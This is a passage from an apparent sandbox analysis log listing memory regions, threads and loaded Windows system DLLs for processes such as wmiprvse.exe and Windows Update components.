entry_point = 0x7fef3006b00 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 1269 start_va = 0x6390000 end_va = 0x656ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006390000" filename = "" Region: id = 1270 start_va = 0x6390000 end_va = 0x64cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006390000" filename = "" Region: id = 1271 start_va = 0x64f0000 end_va = 0x656ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064f0000" filename = "" Region: id = 1272 start_va = 0x6570000 end_va = 0x665ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006570000" filename = "" Region: id = 1273 start_va = 0x6660000 end_va = 0x6a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006660000" filename = "" Region: id = 1274 start_va = 0xfe0000 end_va = 0xfe0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 1275 start_va = 0x1000000 end_va = 0x101ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 1276 start_va = 0x7fef8aa0000 end_va = 0x7fef8b1bfff monitored = 0 entry_point = 0x7fef8aa11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1277 start_va = 0x6a60000 end_va = 0x6bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a60000" filename = "" Region: id = 1278 start_va = 0x1020000 end_va = 0x1022fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 1279 start_va = 0x1030000 end_va = 0x103ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1280 start_va = 0x1040000 end_va = 0x104ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1281 start_va = 0x1050000 end_va = 0x105ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1282 start_va = 0x1230000 end_va = 0x123ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1302 start_va = 0x3a30000 end_va = 0x3ad9fff monitored = 0 entry_point = 0x3a34104 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1303 start_va = 0x1030000 end_va = 0x103cfff monitored = 0 entry_point = 0x103a138 region_type = mapped_file name = "wuauclt.exe" filename = "\\Windows\\System32\\wuauclt.exe" (normalized: "c:\\windows\\system32\\wuauclt.exe") Region: id = 1304 start_va = 0x6c00000 end_va = 0x6e4efff monitored = 0 entry_point = 0x6c0236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1305 start_va = 0x1030000 end_va = 0x1030fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 1306 start_va = 0x5a40000 end_va = 0x5abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a40000" filename = "" Region: id = 1307 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 1308 start_va = 0x1030000 end_va = 0x1030fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001030000" filename = "" Region: id = 1309 start_va = 0x1040000 end_va = 0x104ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1310 start_va = 0x1050000 end_va = 0x105ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1311 start_va = 0x1230000 end_va = 0x123ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1397 start_va = 0x1700000 end_va = 0x177ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 1398 start_va = 0x2aa0000 end_va = 0x2b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002aa0000" filename = "" Region: id = 1410 start_va = 0x2560000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 1411 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Thread: id = 5 os_tid = 0xe88 Thread: id = 6 os_tid = 0xe84 Thread: id = 7 os_tid = 0xd48 Thread: id = 8 os_tid = 0xd2c Thread: id = 9 os_tid = 0xc64 Thread: id = 10 os_tid = 0x8ac Thread: id = 11 os_tid = 0x688 Thread: id = 12 os_tid = 0x730 Thread: id = 13 os_tid = 0x7f4 Thread: id = 14 os_tid = 0x300 Thread: id = 15 os_tid = 0x5b8 Thread: id = 16 os_tid = 0x7a0 Thread: id = 17 os_tid = 0x388 Thread: id = 18 os_tid = 0x310 Thread: id = 19 os_tid = 0x6e8 Thread: id = 20 os_tid = 0x678 Thread: id = 21 os_tid = 0x35c Thread: id = 22 os_tid = 0x6c0 Thread: id = 23 os_tid = 0x668 Thread: id = 24 os_tid = 0x2ac Thread: id = 25 os_tid = 0x72c Thread: id = 26 os_tid = 0x158 Thread: id = 27 os_tid = 0x648 Thread: id = 28 os_tid = 0x358 Thread: id = 29 os_tid = 0x6a0 Thread: id = 30 os_tid = 0x610 Thread: id = 31 os_tid = 0x6b4 Thread: id = 32 os_tid = 0x5c4 Thread: id = 33 os_tid = 0x6c4 Thread: id = 34 os_tid = 0x16c Thread: id = 35 os_tid = 0x63c Thread: id = 36 os_tid = 0x780 Thread: id = 37 os_tid = 0x758 Thread: id = 38 os_tid = 0x680 Thread: id = 39 os_tid = 0x720 Thread: id = 40 os_tid = 0x304 Thread: id = 41 os_tid = 0x320 Thread: id = 42 os_tid = 0x6a8 Thread: id = 43 os_tid = 0x65c Thread: id = 44 os_tid = 0x624 Thread: id = 45 os_tid = 0x620 Thread: id = 46 os_tid = 0x5fc Thread: id = 47 os_tid = 0x5ec Thread: id = 48 os_tid = 0x45c Thread: id = 49 os_tid = 0x458 Thread: id = 50 os_tid = 0x154 Thread: id = 51 os_tid = 0x364 Thread: id = 52 os_tid = 0x454 Thread: id = 53 os_tid = 0x450 Thread: id = 54 os_tid = 0x444 Thread: id = 55 os_tid = 0x1c0 Thread: id = 56 os_tid = 0x3f4 Thread: id = 57 os_tid = 0x3ec Thread: id = 58 os_tid = 0x3e0 Thread: id = 59 os_tid = 0x388 Thread: id = 60 os_tid = 0x374 Thread: id = 61 os_tid = 0x36c Thread: id = 92 os_tid = 0xf3c Thread: id = 95 os_tid = 0xf50 Thread: id = 96 os_tid = 0xf54 Thread: id = 99 os_tid = 0xf78 Thread: id = 102 os_tid = 0xfb4 Thread: id = 104 os_tid = 0xff0 Process: id = "3" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x49860000" os_pid = "0xc6c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00054a98" [0xc000000f] Region: id = 1165 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1166 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1167 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1168 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1169 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1170 start_va = 0x60000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1171 start_va = 0x160000 end_va = 0x1c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1172 start_va = 0x1d0000 end_va = 0x1d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1173 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1174 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1175 start_va = 0x200000 end_va = 0x200fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 1176 start_va = 0x210000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1177 start_va = 0x290000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1178 start_va = 0x390000 end_va = 0x517fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 1179 start_va = 0x520000 end_va = 0x6a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1180 start_va = 0x6b0000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 1181 start_va = 0x770000 end_va = 0xa3efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1182 start_va = 0xa40000 end_va = 0xa40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 1183 start_va = 0xa50000 end_va = 0xa52fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 1184 start_va = 0xa60000 end_va = 0xa64fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 1185 start_va = 0xa70000 end_va = 0xaeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 1186 start_va = 0xaf0000 end_va = 0xaf2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cimwin32.dll.mui" filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui") Region: id = 1187 start_va = 0xb00000 end_va = 0xb0cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1188 start_va = 0xb80000 end_va = 0xbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 1189 start_va = 0xc00000 end_va = 0xc7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 1190 start_va = 0xce0000 end_va = 0xd5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 1191 start_va = 0xd80000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 1192 start_va = 0xe10000 end_va = 0xe8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 1193 start_va = 0xe90000 end_va = 0xf8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 1194 start_va = 0xfd0000 end_va = 0x104ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 1195 start_va = 0x1100000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 1196 start_va = 0x72450000 end_va = 0x72452fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "security.dll" filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll") Region: id = 1197 start_va = 0x77060000 end_va = 0x77159fff monitored = 0 entry_point = 0x7707a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1198 start_va = 0x77160000 end_va = 0x7727efff monitored = 0 entry_point = 0x77175340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1199 start_va = 0x77280000 end_va = 0x77428fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1200 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1201 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1202 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1203 start_va = 0x13f720000 end_va = 0x13f78bfff monitored = 0 entry_point = 0x13f75b450 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 1204 start_va = 0x7fef1c80000 end_va = 0x7fef1c91fff monitored = 0 entry_point = 0x7fef1c8aab8 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 1205 start_va = 0x7fef1ca0000 end_va = 0x7fef1e99fff monitored = 1 entry_point = 0x7fef1cb4c9c region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 1206 start_va = 0x7fef4480000 end_va = 0x7fef44c2fff monitored = 0 entry_point = 0x7fef44a1b50 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1207 start_va = 0x7fef8f60000 end_va = 0x7fef8f71fff monitored = 0 entry_point = 0x7fef8f689d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1208 start_va = 0x7fef9120000 end_va = 0x7fef9140fff monitored = 0 entry_point = 0x7fef91303b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1209 start_va = 0x7fef9240000 end_va = 0x7fef9252fff monitored = 0 entry_point = 0x7fef9241d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1210 start_va = 0x7fef9520000 end_va = 0x7fef952dfff monitored = 0 entry_point = 0x7fef9525500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1211 start_va = 0x7fef9530000 end_va = 0x7fef9556fff monitored = 0 entry_point = 0x7fef95311a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1212 start_va = 0x7fef9560000 end_va = 0x7fef9632fff monitored = 0 entry_point = 0x7fef95d8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1213 start_va = 0x7fef97c0000 end_va = 0x7fef9836fff monitored = 1 entry_point = 0x7fef97fe7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1214 start_va = 0x7fef98b0000 end_va = 0x7fef98b9fff monitored = 0 entry_point = 0x7fef98b31c8 region_type = mapped_file name = "schedcli.dll" filename = "\\Windows\\System32\\schedcli.dll" (normalized: "c:\\windows\\system32\\schedcli.dll") Region: id = 1215 start_va = 0x7fefab30000 end_va = 0x7fefab3efff monitored = 0 entry_point = 0x7fefab31040 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1216 start_va = 0x7fefad80000 end_va = 0x7fefad8bfff monitored = 0 entry_point = 0x7fefad815d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1217 start_va = 0x7fefb250000 end_va = 0x7fefb27cfff monitored = 0 entry_point = 0x7fefb251010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1218 start_va = 0x7fefb2b0000 end_va = 0x7fefb2b7fff monitored = 0 entry_point = 0x7fefb2b11a0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1219 start_va = 0x7fefb3d0000 end_va = 0x7fefb3e3fff monitored = 0 entry_point = 0x7fefb3d16b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1220 start_va = 0x7fefb3f0000 end_va = 0x7fefb404fff monitored = 0 entry_point = 0x7fefb3f1050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1221 start_va = 0x7fefb410000 end_va = 0x7fefb41bfff monitored = 0 entry_point = 0x7fefb4118a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1222 start_va = 0x7fefb420000 end_va = 0x7fefb435fff monitored = 0 entry_point = 0x7fefb4211a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1223 start_va = 0x7fefc6c0000 end_va = 0x7fefc6c9fff monitored = 0 entry_point = 0x7fefc6c3cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1224 start_va = 0x7fefc7c0000 end_va = 0x7fefc806fff monitored = 0 entry_point = 0x7fefc7c1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1225 start_va = 0x7fefc850000 end_va = 0x7fefc8a6fff monitored = 0 entry_point = 0x7fefc855e38 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1226 start_va = 0x7fefc8b0000 end_va = 0x7fefc8dffff monitored = 0 entry_point = 0x7fefc8b194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1227 start_va = 0x7fefcac0000 end_va = 0x7fefcad7fff monitored = 0 entry_point = 0x7fefcac3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1228 start_va = 0x7fefcc30000 end_va = 0x7fefcc51fff monitored = 0 entry_point = 0x7fefcc35d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1229 start_va = 0x7fefcfc0000 end_va = 0x7fefcfe2fff monitored = 0 entry_point = 0x7fefcfc1198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1230 start_va = 0x7fefd060000 end_va = 0x7fefd06afff monitored = 0 entry_point = 0x7fefd061030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1231 start_va = 0x7fefd090000 end_va = 0x7fefd0b4fff monitored = 0 entry_point = 0x7fefd099658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1232 start_va = 0x7fefd0c0000 end_va = 0x7fefd0cefff monitored = 0 entry_point = 0x7fefd0c1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1233 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c3fff monitored = 0 entry_point = 0x7fefd1b10e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1234 start_va = 0x7fefd270000 end_va = 0x7fefd27efff monitored = 0 entry_point = 0x7fefd271020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1235 start_va = 0x7fefd280000 end_va = 0x7fefd2bafff monitored = 0 entry_point = 0x7fefd281324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1236 start_va = 0x7fefd2c0000 end_va = 0x7fefd42cfff monitored = 0 entry_point = 0x7fefd2c10b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1237 start_va = 0x7fefd4d0000 end_va = 0x7fefd53bfff monitored = 0 entry_point = 0x7fefd4d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1238 start_va = 0x7fefd540000 end_va = 0x7fefd575fff monitored = 0 entry_point = 0x7fefd541474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1239 start_va = 0x7fefd580000 end_va = 0x7fefd599fff monitored = 0 entry_point = 0x7fefd581558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1240 start_va = 0x7fefd5a0000 end_va = 0x7fefd6ccfff monitored = 0 entry_point = 0x7fefd5eed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1241 start_va = 0x7fefd6d0000 end_va = 0x7fefd721fff monitored = 0 entry_point = 0x7fefd6d10d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1242 start_va = 0x7fefd730000 end_va = 0x7fefd932fff monitored = 0 entry_point = 0x7fefd753330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1243 start_va = 0x7fefd940000 end_va = 0x7fefd94dfff monitored = 0 entry_point = 0x7fefd941080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1244 start_va = 0x7fefdd50000 end_va = 0x7fefde18fff monitored = 0 entry_point = 0x7fefddca874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1245 start_va = 0x7fefebb0000 end_va = 0x7fefec4efff monitored = 0 entry_point = 0x7fefebb25a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1246 start_va = 0x7fefec50000 end_va = 0x7fefec7dfff monitored = 0 entry_point = 0x7fefec51010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1247 start_va = 0x7fefed00000 end_va = 0x7fefed66fff monitored = 0 entry_point = 0x7fefed0b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1248 start_va = 0x7fefed70000 end_va = 0x7fefed77fff monitored = 0 entry_point = 0x7fefed71504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1249 start_va = 0x7fefed80000 end_va = 0x7fefee88fff monitored = 0 entry_point = 0x7fefed81064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1250 start_va = 0x7feff060000 end_va = 0x7feff13afff monitored = 0 entry_point = 0x7feff080760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1251 start_va = 0x7feff140000 end_va = 0x7feff1d8fff monitored = 0 entry_point = 0x7feff141c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1252 start_va = 0x7feff1e0000 end_va = 0x7feff1fefff monitored = 0 entry_point = 0x7feff1e60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1253 start_va = 0x7feff280000 end_va = 0x7feff2ccfff monitored = 0 entry_point = 0x7feff281070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1254 start_va = 0x7feff2d0000 end_va = 0x7feff3a6fff monitored = 0 entry_point = 0x7feff2d3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1255 start_va = 0x7feff3b0000 end_va = 0x7feff586fff monitored = 0 entry_point = 0x7feff3b1010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1256 start_va = 0x7feff5a0000 end_va = 0x7feff5a0fff 